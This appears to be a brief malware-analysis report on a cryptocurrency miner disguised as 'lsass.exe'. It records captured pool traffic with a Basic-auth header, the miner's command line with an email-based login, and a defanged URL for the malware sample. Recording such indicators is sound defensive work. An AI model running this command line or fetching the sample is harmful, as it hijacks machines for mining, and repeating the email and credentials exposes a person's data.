Resolved : [pool.50btc.com] To [144.76.52.43]
HTTP Requests:
hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache
{“method”: “getblocktemplate”, “params”: [{“capabilities”: [“coinbasetxn”, “workid”, “coinbase/append”, “longpollid”]}], “id”:0}
Here the hecker:
lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample:hxxp://158.255.2.104/cucaz.exe
hosting infos:
http://whois.domaintools.com/144.76.52.43